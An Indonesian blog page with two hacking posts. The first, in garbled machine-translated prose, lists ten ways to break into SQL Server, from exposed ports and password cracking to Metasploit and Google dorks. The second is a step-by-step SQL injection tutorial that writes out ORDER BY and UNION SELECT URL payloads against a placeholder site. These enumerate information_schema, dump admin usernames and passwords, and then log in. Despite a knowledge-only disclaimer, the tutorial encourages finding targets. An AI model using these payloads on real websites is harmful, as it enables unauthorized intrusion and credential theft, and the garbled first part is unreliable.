10 Trik Menerobos Sistem SQL Server

Apakah itu melalui manual menyodok dan dorongan atau penggunaan alat-alat pengujian keamanan, penyerang berbahaya menggunakan berbagai trik untuk masuk ke sistem SQL Server, baik di dalam dan luar firewall Anda. Hal ini cukup beralasan kemudian, jika para hacker melakukannya, Anda perlu membawa serangan yang sama untuk menguji kekuatan keamanan sistem Anda. Berikut adalah trik hacker 10 untuk mendapatkan akses dan melanggar sistem yang menjalankan SQL Server.

1. Langsung koneksi melalui InternetKoneksi ini dapat digunakan untuk melampirkan SQL Server duduk telanjang tanpa perlindungan firewall untuk seluruh dunia untuk melihat (dan akses).Laporan Pelabuhan DShield menunjukkan betapa banyak sistem yang duduk di sana menunggu untuk diserang. Saya tidak mengerti logika di balik pembuatan server kritis seperti ini langsung diakses dari internet, tapi saya masih menemukan cacat ini dalam penilaian saya, dan kita semua ingat efek worm SQL Slammer yang pada begitu banyak sistem SQL Server rentan. Namun demikian, serangan-serangan langsung dapat menyebabkan penolakan layanan, buffer overflows dan banyak lagi.2. Pemindaian kerentananKerentanan pemindaian sering mengungkapkan kelemahan di OS yang mendasari, aplikasi Web atau sistem database itu sendiri. Apa pun yang hilang dari patch SQL Server untuk Internet Information Services (IIS) konfigurasi SNMP eksploitasi kelemahan untuk dapat ditemukan oleh penyerang dan menyebabkan kompromi database server. Orang-orang jahat dapat menggunakan open source, rumah-tumbuh atau alat komersial. Beberapa bahkan cukup cerdas untuk melakukan hacks mereka secara manual dari command prompt. Dalam kepentingan waktu (dan roda berputar minimal), saya sarankan menggunakan alat penilaian kerentanan komersial seperti QualysGuard dari Qualys Inc (untuk pemindaian umum), dari SPI Dynamics WebInspect (untuk memindai aplikasi Web) dan Generasi Keamanan Berikutnya Software Ltd 's NGSSquirrel untuk SQL Server (untuk database-spesifik pemindaian). Mereka mudah digunakan, menawarkan penilaian yang paling komprehensif dan, pada gilirannya, memberikan hasil terbaik. Gambar 1 menunjukkan beberapa kerentanan SQL injection Anda mungkin dapat mengungkap.

Gambar 1: Common SQL injection kerentanan ditemukan menggunakan WebInspect.3. Pencacahan Service SQL Server ResolusiMenjalankan pada UDP port 1434, ini memungkinkan Anda untuk menemukan contoh-contoh database yang tersembunyi dan menggali lebih dalam ke dalam sistem. Chip Andrews 'v SQLPing 2,5 adalah alat yang besar untuk digunakan untuk mencari SQL Server sistem (s) dan menentukan nomor versi (agak). Ini bekerja bahkan jika kasus SQL server tidak mendengarkan pada port default.Juga, buffer overflow dapat terjadi ketika permintaan terlalu panjang untuk SQL Server akan dikirim ke alamat broadcast untuk UDP port 1434.4. Cracking password SAMengartikan password SA adalah juga digunakan oleh penyerang untuk masuk ke database SQL Server. Sayangnya, dalam banyak kasus, tidak ada retak diperlukan karena password telah ditetapkan (Oh, logika, di mana engkau?!).Namun lain digunakan untuk alat SQLPing berguna-pesolek disebutkan sebelumnya. Produk komersial AppDetective dari Aplikasi Keamanan Inc dan NGSSQLCrack dari NGS Software Ltd juga memiliki kemampuan ini.5. Direct-mengeksploitasi seranganSerangan langsung menggunakan alat seperti Metasploit, ditunjukkan dalam Gambar 2, dan setara komersial (CANVAS dan IMPACT INTI) digunakan untuk mengeksploitasi kelemahan tertentu yang ditemukan selama pemindaian kerentanan yang normal. Ini biasanya hack peluru perak bagi penyerang menembus suatu sistem dan melakukan injeksi kode atau mendapatkan sah mengakses baris-perintah.Gambar 2: SQL Server kerentanan dieksploitasi menggunakan MSFConsole Metasploit itu.6. Injeksi SQLSerangan injeksi SQL yang dijalankan melalui aplikasi front-end Web yang tidak benar memvalidasi input pengguna. Cacat SQL query, termasuk perintah SQL, dapat dimasukkan langsung ke dalam URL Web dan kembali kesalahan informatif, perintah dieksekusi dan banyak lagi. Serangan ini dapat dilakukan secara manual - jika Anda memiliki banyak waktu. Setelah saya menemukan bahwa server memiliki kerentanan SQL injection potensial, saya lebih memilih untuk melakukan tindak lanjut dengan menggunakan alat otomatis, seperti SPI Dynamics SQL Injector, ditunjukkan dalam Gambar 3.Gambar 3: SPI Dynamics SQL alat Injector mengotomatiskan proses injeksi SQL.7. Blind SQL injectionSerangan-serangan ini pergi tentang pemanfaatan aplikasi web dan back-end SQL Server dengan cara dasar yang sama seperti injeksi SQL standar.Perbedaan besar adalah bahwa penyerang tidak menerima umpan balik dari server Web dalam bentuk pesan kesalahan kembali. Serangan seperti ini bahkan lebih lambat dari standar yang diberikan injeksi SQL dugaan terlibat. Anda perlu alat yang baik untuk situasi ini, dan di sanalah Absinthe, ditunjukkan dalam Gambar 4, datang dalam berguna.Gambar 4: Alat Absinthe mengambil rasa sakit dari pengujian injeksi SQL buta.8. Reverse engineering sistemTrik reverse engineering mencari eksploitasi perangkat lunak, kelemahan memori korupsi dan sebagainya. Dalam bab ini sampel dari buku yang sangat bagus Pemanfaatan Software: Cara Break Kode Greg Hoglund dan Gary McGraw, Anda akan menemukan diskusi tentang ploys reverse engineering.9. Google hacksGoogle hacks menggunakan kekuatan yang luar biasa dari mesin pencari Google untuk menemukan kesalahan SQL Server - seperti "sintaks salah dekat" - bocor dari sistem diakses publik. Beberapa query Google tersedia di database Google Hacking Johnny Long. (Lihat di bagian berjudul Pesan Kesalahan dan File yang mengandung password.) Hacker menggunakan Google untuk menemukan password, kerentanan di server Web, yang mendasari sistem operasi, prosedur umum tersedia dan lebih yang dapat mereka gunakan untuk lebih kompromi sistem SQL Server. Menggabungkan query ini dengan nama situs Web melalui Google "site:" Operator sering muncul berair Info Anda pernah membayangkan Anda bisa menggali.10. Membaca dengan teliti kode situs Web sumberSource code juga dapat muncul informasi yang dapat menyebabkan SQL Server mendobrak masuk khusus, pengembang dapat menyimpan informasi otentikasi SQL Server dalam skrip ASP untuk menyederhanakan proses otentikasi. Suatu penilaian manual atau Google bisa menemukan informasi ini dalam hitungan detik.


http://rafi-orilya.blogspot.com/2011/09/10-trik-menerobos-sistem-sql-server.html#ixzz2tT6t7IGA
Perlindungan Hak Cipta Oleh Rafi Orilya Groups
Under Creative Commons License: Attribution Share Alike

Cara Hacking Website dengan teknik SQL Injection

Harap dicatat bahwa penulis tidak bertanggung jawab atas segala bentuk efek dari artikel ini, tujuannya hanya untuk pengetahuan saja, jadi silahkan gunakan untuk kebaikan dan keamanan kalian masing2. Pertanyaan yang bersifat “Merusak” tidak akan ditanggapi.
Cara ngehacking web atau biasa disebut web attack sangat banyak caranya, salah satunya dengan cara SQL injection.
Apa itu SQL injection ?
SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke ‘query’ dengan cara manipulasi data input ke applikasi tsb.
ini salah satu cara melakukan tekhnik SQL injection
oke, mari kita simak bersama-sama.
1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah

http://www.target.com/berita.php?id=100
2. Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
Contoh :
http://www.target.com/berita.php?id=100'
atau
http://www.target.com/berita.php?id=-100
4. Maka akan muncul pesan error…
“You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near ”’
at line 1″ Dan masih banyak lagi macamnya.

5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya…
Disini kita akan menggunakan perintah order by

Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*
Hohoho…apalagi itu “/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake “–”. Terserah aja…
Kalo “+” sebagai penghubung perintah…
6. Nah sampe sini langsung dah nyobain satu2…
http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)
Sampai muncul error…
Misalkan errornya disini…

http://www.target.com/berita.php?id=100+order+by+10/*
Berarti yang kita ambil adalah “9″
http://www.target.com/berita.php?id=100+order+by+9/*
7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION
Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*
Trus perhatikan angka berapa yang keluar (Kayak togel aja… ;p)
8. Misalnya angka hoki yang keluar adalah “3″ maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”
http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*
Atau
http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*
9. Nah kalo versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database…
Contoh :
http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya…Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain…ya maklum lah baru belajar…Hehehe…
Misalnya yang lo liat adalah table “admin”
Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…
Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*
Misalnya kolom yang keluar adalah “password” dan “username”
Langsung aja kita liat isinya…

Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*
dan
http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*
Bisa diliat dah username ama passwordnya…Tinggal login…Cari yang asik terus…Terserah Anda…
—————————————————
begitulah yang dituliskan disana.
anda masih belum paham tentang apa SQL injection ?
tenang silahkan anda download file dokumen dibawah ini tentang SQL injection step by step.


Download SQL injection step by step.DOC
oke selamat mencoba. yang terpenting jangan dilakukan di web teman anda ataupun di website Lokal.
referensi :
http://jasakom.com
http://ezine.echo.or.id
http://cruzenaldo.co.cc
http://students.ee.itb.ac.id

Text Widget

Blogger news

Flame

Blogger templates

Admin I

Feedjit

Ads 468x60px

Social Icons

Popular Posts

Be a Part Of Us Here

Pencarian

Featured Posts

Copyright © / MY GALLERY

Template by : Urang-kurai / powered by :blogger